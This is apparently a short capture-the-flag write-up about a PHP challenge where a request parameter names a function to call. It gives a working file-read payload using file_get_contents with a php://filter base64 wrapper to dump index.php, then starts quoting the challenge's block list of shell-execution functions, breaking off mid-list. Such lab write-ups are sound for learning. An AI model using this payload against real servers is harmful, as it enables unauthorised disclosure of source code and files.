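I. Information Gathering

Opening the page shows that it keeps submitting data automatically, so capture the request. The parameters suggest that the backend calls a function by name and that only a single argument is supported. Try the file_get_contents function with a PHP pseudo-protocol ([[漏洞笔记/PHP/PHP伪协议]]) to read index.php.

payload: func=file_get_contents&p=php://filter/read%3dconvert.base64-encode/resource=index.php

Decoding the response gives the source code:

$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","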
Network Security · CTF
· 2023-12-03
· 555 views
Equinox